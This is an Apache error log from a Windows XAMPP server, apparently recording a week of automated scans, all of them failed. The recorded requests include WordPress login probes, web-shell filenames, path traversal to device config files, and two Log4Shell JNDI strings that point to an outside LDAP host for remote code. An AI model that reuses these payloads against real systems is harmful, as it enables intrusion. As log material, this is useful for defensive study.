[Mon Jun 19 23:23:40.805337 2023] [cgi:error] [pid 24848:tid 3400] [client 152.32.212.119:39696] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/step1.asp, referer: http://fphosting.eu/step1.asp
[Mon Jun 19 23:23:42.999140 2023] [php:error] [pid 24848:tid 3408] [client 152.32.212.119:39708] script 'C:/xampp/htdocs/default/waplogin.php' not found or unable to stat, referer: http://fphosting.eu/waplogin.php
[Mon Jun 19 23:23:44.003521 2023] [php:error] [pid 24848:tid 3400] [client 152.32.212.119:39696] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php/sign
[Mon Jun 19 23:23:44.707017 2023] [cgi:error] [pid 24848:tid 3228] [client 152.32.212.119:39678] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/verification.asp, referer: http://fphosting.eu/verification.asp
[Mon Jun 19 23:23:52.057510 2023] [php:error] [pid 24848:tid 3668] [client 152.32.212.119:39730] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php/Wap/Api/getBanner
[Mon Jun 19 23:23:54.056095 2023] [php:error] [pid 24848:tid 3408] [client 152.32.212.119:39708] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php/Wap/Api/getSystemNotice?id=1
[Mon Jun 19 23:23:54.294671 2023] [php:error] [pid 24848:tid 3668] [client 152.32.212.119:39730] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php?m=api&c=app&a=getPlatformConfig
[Mon Jun 19 23:23:55.140759 2023] [php:error] [pid 24848:tid 3668] [client 152.32.212.119:39730] script 'C:/xampp/htdocs/default/leftDao.php' not found or unable to stat, referer: http://fphosting.eu/leftDao.php?callback=jQuery183016740860980352856_1604309800583
[Tue Jun 20 03:05:15.093419 2023] [php:error] [pid 24848:tid 3272] [client 194.169.175.36:60078] script 'C:/xampp/htdocs/default/repeater.php' not found or unable to stat
[Tue Jun 20 06:10:07.389310 2023] [php:error] [pid 24848:tid 3600] [client 101.43.84.32:57937] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Tue Jun 20 06:10:07.597565 2023] [authz_core:error] [pid 24848:tid 3600] [client 101.43.84.32:57937] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/index.php
[Tue Jun 20 06:23:08.694122 2023] [php:error] [pid 24848:tid 3496] [client 152.32.213.51:35018] script 'C:/xampp/htdocs/default/reg.php' not found or unable to stat, referer: http://fphosting.eu/reg.php
[Tue Jun 20 06:23:09.049959 2023] [cgi:error] [pid 24848:tid 3616] [client 152.32.213.51:35024] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/step1.asp, referer: http://fphosting.eu/step1.asp
[Tue Jun 20 06:23:11.183788 2023] [php:error] [pid 24848:tid 3248] [client 152.32.213.51:34982] script 'C:/xampp/htdocs/default/waplogin.php' not found or unable to stat, referer: http://fphosting.eu/waplogin.php
[Tue Jun 20 06:23:12.193040 2023] [php:error] [pid 24848:tid 3240] [client 152.32.213.51:34992] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php/sign
[Tue Jun 20 06:23:12.926617 2023] [cgi:error] [pid 24848:tid 3496] [client 152.32.213.51:35018] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/verification.asp, referer: http://fphosting.eu/verification.asp
[Tue Jun 20 06:23:20.321168 2023] [php:error] [pid 24848:tid 3600] [client 152.32.213.51:34970] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php/Wap/Api/getBanner
[Tue Jun 20 06:23:22.254963 2023] [php:error] [pid 24848:tid 3264] [client 152.32.213.51:35008] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php/Wap/Api/getSystemNotice?id=1
[Tue Jun 20 06:23:22.573426 2023] [php:error] [pid 24848:tid 3600] [client 152.32.213.51:34970] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://fphosting.eu/index.php?m=api&c=app&a=getPlatformConfig
[Tue Jun 20 06:23:23.335570 2023] [php:error] [pid 24848:tid 3600] [client 152.32.213.51:34970] script 'C:/xampp/htdocs/default/leftDao.php' not found or unable to stat, referer: http://fphosting.eu/leftDao.php?callback=jQuery183016740860980352856_1604309800583
[Tue Jun 20 15:33:18.242226 2023] [php:error] [pid 24848:tid 3468] [client 194.113.235.171:49050] script 'C:/xampp/htdocs/default/b.php' not found or unable to stat, referer: http://fphosting.eu/b.php
[Tue Jun 20 15:35:39.428640 2023] [php:error] [pid 24848:tid 3268] [client 194.113.235.171:60359] script 'C:/xampp/htdocs/default/root.php' not found or unable to stat, referer: http://fphosting.eu/root.php
[Tue Jun 20 18:23:08.238072 2023] [php:error] [pid 24848:tid 3484] [client 210.16.185.3:62687] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Jun 20 18:28:46.631458 2023] [php:error] [pid 24848:tid 3584] [client 66.249.66.167:43035] script 'C:/xampp/htdocs/default/applicazione.php' not found or unable to stat
[Tue Jun 20 22:54:42.663188 2023] [php:error] [pid 24848:tid 3264] [client 121.4.238.122:56310] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://ns4.fphosting.eu
[Tue Jun 20 22:54:43.730733 2023] [php:error] [pid 24848:tid 3264] [client 121.4.238.122:56392] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.ns4.fphosting.eu
[Wed Jun 21 00:36:11.905903 2023] [php:error] [pid 24848:tid 3584] [client 185.61.154.16:56876] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 02:47:00.225300 2023] [cgi:error] [pid 24848:tid 3444] [client 120.85.115.228:11683] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/setup.cgi
[Wed Jun 21 03:12:07.540961 2023] [php:error] [pid 24848:tid 3204] [client 5.101.156.211:55225] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 03:45:37.968703 2023] [php:error] [pid 24848:tid 3204] [client 110.14.63.77:42930] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://mta-sts.mx.fphosting.eu
[Wed Jun 21 03:45:40.169308 2023] [php:error] [pid 24848:tid 3204] [client 110.14.63.77:43286] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.mta-sts.mx.fphosting.eu
[Wed Jun 21 04:40:29.592139 2023] [php:error] [pid 24848:tid 3204] [client 103.101.225.11:47910] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 05:31:08.135816 2023] [php:error] [pid 24848:tid 3444] [client 103.101.225.11:41372] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 05:53:30.633709 2023] [php:error] [pid 24848:tid 3444] [client 190.107.177.252:49821] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 05:58:40.146525 2023] [php:error] [pid 24848:tid 3444] [client 185.70.95.8:47362] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 06:06:04.015444 2023] [core:error] [pid 24848:tid 3444] [client 193.32.162.190:38396] AH10244: invalid URI path (/../../mnt/mtd/Config/Account1)
[Wed Jun 21 06:23:12.709694 2023] [php:error] [pid 24848:tid 3484] [client 188.85.81.233:49996] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 06:41:19.414138 2023] [php:error] [pid 24848:tid 3484] [client 83.240.221.24:52989] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://mta-sts.mail.fphosting.eu
[Wed Jun 21 06:41:19.987440 2023] [php:error] [pid 24848:tid 3484] [client 83.240.221.24:63568] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.mta-sts.mail.fphosting.eu
[Wed Jun 21 06:53:57.154949 2023] [core:error] [pid 24848:tid 3204] [client 193.32.162.190:60528] AH10244: invalid URI path (/../../mnt/mtd/Config/Account2)
[Wed Jun 21 09:43:19.547794 2023] [php:error] [pid 24848:tid 3484] [client 192.254.172.150:43542] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 10:09:52.922338 2023] [php:error] [pid 24848:tid 3696] [client 85.128.143.134:45178] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Wed Jun 21 12:54:27.849110 2023] [php:error] [pid 24848:tid 3476] [client 39.101.185.186:57760] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Jun 21 13:14:31.632893 2023] [php:error] [pid 24848:tid 3476] [client 194.113.235.171:43200] script 'C:/xampp/htdocs/default/a.php' not found or unable to stat, referer: http://fphosting.eu/a.php
[Wed Jun 21 14:21:24.337739 2023] [php:error] [pid 24848:tid 3476] [client 194.169.175.34:49873] script 'C:/xampp/htdocs/default/repeater.php' not found or unable to stat
[Wed Jun 21 14:21:24.684858 2023] [php:error] [pid 24848:tid 3476] [client 194.169.175.34:63735] script 'C:/xampp/htdocs/default/alfanew.php' not found or unable to stat
[Wed Jun 21 14:21:25.152728 2023] [php:error] [pid 24848:tid 3476] [client 194.169.175.34:65460] script 'C:/xampp/htdocs/default/wso112233.php' not found or unable to stat
[Wed Jun 21 14:21:25.275443 2023] [php:error] [pid 24848:tid 3476] [client 194.169.175.34:62842] script 'C:/xampp/htdocs/default/wp-consar.php' not found or unable to stat
[Wed Jun 21 21:46:20.904002 2023] [php:error] [pid 24848:tid 3400] [client 90.156.169.13:22322] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:46:20.905001 2023] [php:error] [pid 24848:tid 3264] [client 90.156.169.13:22320] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 21:48:27.362513 2023] [php:error] [pid 24848:tid 3400] [client 94.154.117.40:47346] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:48:27.364522 2023] [php:error] [pid 24848:tid 3264] [client 94.154.117.40:47332] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 21:50:52.667559 2023] [php:error] [pid 24848:tid 3400] [client 44.224.182.170:33136] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:50:52.668559 2023] [php:error] [pid 24848:tid 3264] [client 44.224.182.170:33128] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 21:50:58.183776 2023] [php:error] [pid 24848:tid 3372] [client 208.109.42.14:24193] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:50:58.186765 2023] [php:error] [pid 24848:tid 3696] [client 208.109.42.14:24195] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 21:55:33.326040 2023] [php:error] [pid 24848:tid 3372] [client 208.109.42.14:54421] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 21:55:33.326040 2023] [php:error] [pid 24848:tid 3696] [client 208.109.42.14:54423] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:56:24.853369 2023] [php:error] [pid 24848:tid 3372] [client 54.147.22.218:43418] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:56:24.853369 2023] [php:error] [pid 24848:tid 3476] [client 54.147.22.218:43406] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 21:57:32.169102 2023] [php:error] [pid 24848:tid 3476] [client 185.105.110.4:51704] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 21:57:32.269167 2023] [php:error] [pid 24848:tid 3476] [client 185.105.110.4:51704] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:57:41.042461 2023] [php:error] [pid 24848:tid 3476] [client 173.212.227.11:36366] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Wed Jun 21 21:57:41.042461 2023] [php:error] [pid 24848:tid 3696] [client 173.212.227.11:36364] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 22:07:07.000367 2023] [php:error] [pid 24848:tid 3696] [client 178.159.247.46:42084] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Wed Jun 21 22:07:07.000367 2023] [php:error] [pid 24848:tid 3476] [client 178.159.247.46:42096] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Thu Jun 22 02:28:23.190257 2023] [php:error] [pid 24848:tid 3400] [client 178.159.247.46:28810] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Thu Jun 22 02:28:23.195197 2023] [php:error] [pid 24848:tid 3624] [client 178.159.247.46:28808] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Thu Jun 22 03:43:32.595182 2023] [php:error] [pid 24848:tid 3476] [client 14.18.119.55:53357] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Jun 22 07:20:21.979247 2023] [php:error] [pid 24848:tid 3584] [client 185.220.103.114:34325] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Jun 22 10:17:40.428484 2023] [php:error] [pid 24848:tid 3556] [client 66.249.66.14:45083] script 'C:/xampp/htdocs/default/robots.php' not found or unable to stat
[Thu Jun 22 15:21:54.244467 2023] [php:error] [pid 24848:tid 3372] [client 202.149.70.10:56404] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Thu Jun 22 18:04:50.203899 2023] [php:error] [pid 24848:tid 3556] [client 14.29.215.243:61213] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Jun 22 19:36:05.060198 2023] [php:error] [pid 24848:tid 3568] [client 66.249.66.34:50014] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Thu Jun 22 20:13:01.724541 2023] [php:error] [pid 24848:tid 3400] [client 5.188.210.227:49275] script 'C:/xampp/htdocs/default/echo.php' not found or unable to stat, referer: https://www.google.com/
[Fri Jun 23 01:52:24.082945 2023] [php:error] [pid 24848:tid 3424] [client 67.205.191.23:34788] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://baze.fphosting.eu
[Fri Jun 23 01:52:24.551944 2023] [php:error] [pid 24848:tid 3424] [client 67.205.191.23:34792] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.baze.fphosting.eu
[Fri Jun 23 01:53:42.899174 2023] [php:error] [pid 24848:tid 3424] [client 190.96.76.26:32838] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Jun 23 03:03:55.613773 2023] [php:error] [pid 24848:tid 3424] [client 202.28.120.40:42214] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://ns3.fphosting.eu
[Fri Jun 23 03:03:56.837200 2023] [php:error] [pid 24848:tid 3424] [client 202.28.120.40:42386] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.ns3.fphosting.eu
[Fri Jun 23 07:24:42.988547 2023] [core:error] [pid 24848:tid 3424] (20024)The given path is misformatted or contained invalid characters: [client 122.129.112.220:48362] AH00127: Cannot map GET /${jndi:ldap://196.21.83.146:1389/Exploit} HTTP/1.1 to file
[Fri Jun 23 10:08:36.020778 2023] [php:error] [pid 24848:tid 3484] [client 164.90.170.158:50902] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Jun 23 10:43:57.955917 2023] [cgi:error] [pid 24848:tid 3400] [client 34.141.20.101:50608] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/luci
[Fri Jun 23 10:43:57.971855 2023] [core:error] [pid 24848:tid 3400] (20024)The given path is misformatted or contained invalid characters: [client 34.141.20.101:50616] AH00127: Cannot map GET /${jndi:ldap://196.21.83.146:1389/Exploit} HTTP/1.1 to file
[Fri Jun 23 12:29:18.352901 2023] [php:error] [pid 24848:tid 3484] [client 167.99.190.73:50862] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Fri Jun 23 14:07:16.843411 2023] [php:error] [pid 24848:tid 3528] [client 199.249.230.156:39490] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Jun 23 17:21:03.938520 2023] [php:error] [pid 24848:tid 3484] [client 79.174.70.211:34798] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:23:44.711299 2023] [php:error] [pid 24848:tid 3484] [client 5.252.229.139:44476] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:23:57.666713 2023] [php:error] [pid 24848:tid 3476] [client 85.214.243.70:34758] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:25:28.925800 2023] [php:error] [pid 24848:tid 3584] [client 121.4.238.122:60894] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://wiki.fphosting.eu
[Fri Jun 23 17:25:29.846464 2023] [php:error] [pid 24848:tid 3584] [client 121.4.238.122:60972] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.wiki.fphosting.eu
[Fri Jun 23 17:27:15.253486 2023] [php:error] [pid 24848:tid 3584] [client 198.71.230.68:21608] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:28:13.560976 2023] [php:error] [pid 24848:tid 3336] [client 64.227.170.136:60250] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:29:07.358848 2023] [php:error] [pid 24848:tid 3424] [client 166.0.175.226:50558] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:30:42.093584 2023] [php:error] [pid 24848:tid 3476] [client 79.174.70.211:48866] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:31:55.538084 2023] [php:error] [pid 24848:tid 3624] [client 195.78.66.201:53262] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:34:04.296835 2023] [php:error] [pid 24848:tid 3424] [client 142.93.51.229:38370] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:34:34.539205 2023] [php:error] [pid 24848:tid 3424] [client 128.199.254.85:36310] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:36:10.779236 2023] [php:error] [pid 24848:tid 3424] [client 90.156.169.210:43188] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 17:45:34.402270 2023] [php:error] [pid 24848:tid 3268] [client 89.253.225.79:45212] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 20:28:12.080230 2023] [php:error] [pid 24848:tid 3372] [client 190.96.76.26:59836] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Jun 23 20:51:23.704909 2023] [php:error] [pid 24848:tid 3696] [client 59.11.214.75:33062] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://doma.fphosting.eu
[Fri Jun 23 20:51:24.944920 2023] [php:error] [pid 24848:tid 3696] [client 59.11.214.75:33510] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.doma.fphosting.eu
[Fri Jun 23 21:42:45.985413 2023] [php:error] [pid 24848:tid 3464] [client 92.204.184.3:33550] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Jun 23 21:54:47.915107 2023] [php:error] [pid 24848:tid 3464] [client 184.168.115.185:22890] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Jun 23 22:11:36.939584 2023] [php:error] [pid 24848:tid 3584] [client 38.47.80.100:48196] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Jun 23 22:35:33.919961 2023] [php:error] [pid 24848:tid 3624] [client 87.247.244.225:46848] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Jun 23 23:08:09.820989 2023] [php:error] [pid 24848:tid 3268] [client 82.223.205.193:52808] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 01:10:43.093125 2023] [php:error] [pid 24848:tid 3584] [client 159.223.173.153:43082] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://panel.fphosting.eu
[Sat Jun 24 01:10:43.417262 2023] [php:error] [pid 24848:tid 3584] [client 159.223.173.153:43116] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.panel.fphosting.eu
[Sat Jun 24 02:29:26.181710 2023] [php:error] [pid 24848:tid 3568] [client 148.72.206.105:43262] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 02:29:36.293395 2023] [php:error] [pid 24848:tid 3568] [client 210.16.185.3:56361] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 02:41:25.773634 2023] [php:error] [pid 24848:tid 3584] [client 162.240.52.12:44526] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 03:54:15.350432 2023] [php:error] [pid 24848:tid 3584] [client 194.169.175.35:49893] script 'C:/xampp/htdocs/default/repeater.php' not found or unable to stat
[Sat Jun 24 05:09:23.183362 2023] [php:error] [pid 24848:tid 3464] [client 37.59.254.146:48416] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 07:24:03.093651 2023] [php:error] [pid 24848:tid 3464] [client 154.0.166.29:48966] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 07:49:47.818367 2023] [php:error] [pid 24848:tid 3484] [client 185.82.216.41:45834] script 'C:/xampp/htdocs/default/wp-cc.php' not found or unable to stat
[Sat Jun 24 07:49:47.818367 2023] [php:error] [pid 24848:tid 3464] [client 185.82.216.41:45832] script 'C:/xampp/htdocs/default/wp-commentin.php' not found or unable to stat
[Sat Jun 24 11:58:55.593665 2023] [php:error] [pid 24848:tid 3204] [client 194.163.152.242:44406] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://email.fphosting.eu
[Sat Jun 24 11:58:56.309609 2023] [php:error] [pid 24848:tid 3204] [client 194.163.152.242:44618] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.email.fphosting.eu
[Sat Jun 24 17:50:07.521146 2023] [php:error] [pid 24848:tid 3204] [client 151.106.35.235:52732] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 18:43:17.119337 2023] [php:error] [pid 24848:tid 3444] [client 85.215.176.85:63021] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Sat Jun 24 19:02:54.619378 2023] [php:error] [pid 24848:tid 3592] [client 93.114.235.167:38796] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 19:58:58.055835 2023] [php:error] [pid 24848:tid 3584] [client 114.132.250.235:60356] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 20:12:54.145588 2023] [php:error] [pid 24848:tid 3584] [client 194.113.235.171:38235] script 'C:/xampp/htdocs/default/options.php' not found or unable to stat, referer: http://fphosting.eu/options.php
[Sat Jun 24 20:18:58.266613 2023] [php:error] [pid 24848:tid 3584] [client 45.89.246.214:36332] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 20:45:40.257682 2023] [php:error] [pid 24848:tid 3228] [client 144.217.180.40:45552] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 20:47:56.044383 2023] [php:error] [pid 24848:tid 3228] [client 216.10.250.113:51890] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 22:36:13.844480 2023] [php:error] [pid 24848:tid 3228] [client 103.90.228.106:39114] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 23:11:05.662957 2023] [php:error] [pid 24848:tid 3568] [client 97.74.91.90:59310] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sat Jun 24 23:53:23.075847 2023] [php:error] [pid 24848:tid 3568] [client 194.169.175.36:51615] script 'C:/xampp/htdocs/default/xl2023.php' not found or unable to stat
[Sun Jun 25 04:37:34.216538 2023] [php:error] [pid 24848:tid 3564] [client 143.110.190.133:44646] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Sun Jun 25 04:37:35.906558 2023] [php:error] [pid 24848:tid 3564] [client 143.110.190.133:44698] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Sun Jun 25 04:43:00.390459 2023] [php:error] [pid 24848:tid 3564] [client 194.113.235.171:51831] script 'C:/xampp/htdocs/default/aa.php' not found or unable to stat, referer: http://fphosting.eu/aa.php
[Sun Jun 25 05:39:33.356813 2023] [php:error] [pid 24848:tid 3568] [client 194.169.175.35:61811] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Sun Jun 25 06:15:17.589936 2023] [php:error] [pid 24848:tid 3568] [client 85.215.176.85:51496] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Sun Jun 25 11:36:18.312858 2023] [php:error] [pid 24848:tid 3336] [client 222.73.22.8:61055] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Jun 25 19:10:46.925049 2023] [php:error] [pid 24848:tid 3592] [client 143.244.159.32:48246] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Sun Jun 25 19:10:48.138103 2023] [php:error] [pid 24848:tid 3592] [client 143.244.159.32:48280] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Sun Jun 25 19:15:19.194551 2023] [php:error] [pid 24848:tid 3592] [client 92.204.184.3:42644] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Jun 25 21:00:50.935038 2023] [php:error] [pid 24848:tid 3464] [client 66.249.68.66:61110] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Sun Jun 25 22:11:44.181898 2023] [php:error] [pid 24848:tid 3464] [client 146.19.213.11:38592] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Jun 25 22:31:13.491069 2023] [php:error] [pid 24848:tid 3528] [client 50.62.177.107:55015] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Jun 25 22:39:04.335723 2023] [php:error] [pid 24848:tid 3528] [client 150.230.93.233:47602] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Jun 25 22:40:55.427450 2023] [php:error] [pid 24848:tid 3528] [client 103.152.79.201:58134] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Jun 25 22:48:21.408822 2023] [php:error] [pid 24848:tid 3336] [client 141.148.159.69:47026] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Jun 25 23:19:52.622194 2023] [php:error] [pid 24848:tid 3216] [client 194.113.235.171:37228] script 'C:/xampp/htdocs/default/xxx.php' not found or unable to stat, referer: http://fphosting.eu/xxx.php
[Mon Jun 26 00:20:02.265800 2023] [php:error] [pid 24848:tid 3556] [client 72.167.51.34:40246] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Jun 26 00:35:13.873129 2023] [php:error] [pid 24848:tid 3464] [client 161.35.114.17:41010] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://emily.fphosting.eu
[Mon Jun 26 00:35:14.298815 2023] [php:error] [pid 24848:tid 3464] [client 161.35.114.17:41154] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.emily.fphosting.eu
[Mon Jun 26 01:02:27.483371 2023] [php:error] [pid 24848:tid 3556] [client 64.227.142.70:51494] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Mon Jun 26 01:02:29.097612 2023] [php:error] [pid 24848:tid 3556] [client 64.227.142.70:51558] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Mon Jun 26 01:25:21.126222 2023] [php:error] [pid 24848:tid 3556] [client 59.11.214.75:59754] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://fphosting.eu
[Mon Jun 26 01:25:22.208726 2023] [php:error] [pid 24848:tid 3556] [client 59.11.214.75:60442] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.fphosting.eu
[Mon Jun 26 01:36:07.938958 2023] [cgi:error] [pid 24848:tid 3556] [client 172.104.137.47:40942] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/localstart.cgi
[Mon Jun 26 01:36:08.850292 2023] [php:error] [pid 24848:tid 3556] [client 172.104.137.47:57932] script 'C:/xampp/htdocs/default/indice.php' not found or unable to stat
[Mon Jun 26 01:36:09.609244 2023] [php:error] [pid 24848:tid 3556] [client 172.104.137.47:57986] script 'C:/xampp/htdocs/default/default.php' not found or unable to stat
[Mon Jun 26 01:36:09.761228 2023] [cgi:error] [pid 24848:tid 3556] [client 172.104.137.47:57998] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/inicio.cgi
[Mon Jun 26 01:36:10.216535 2023] [php:error] [pid 24848:tid 3556] [client 172.104.137.47:58026] script 'C:/xampp/htdocs/default/menu.php' not found or unable to stat
[Mon Jun 26 01:36:10.368531 2023] [php:error] [pid 24848:tid 3556] [client 172.104.137.47:58034] script 'C:/xampp/htdocs/default/inicio.php' not found or unable to stat
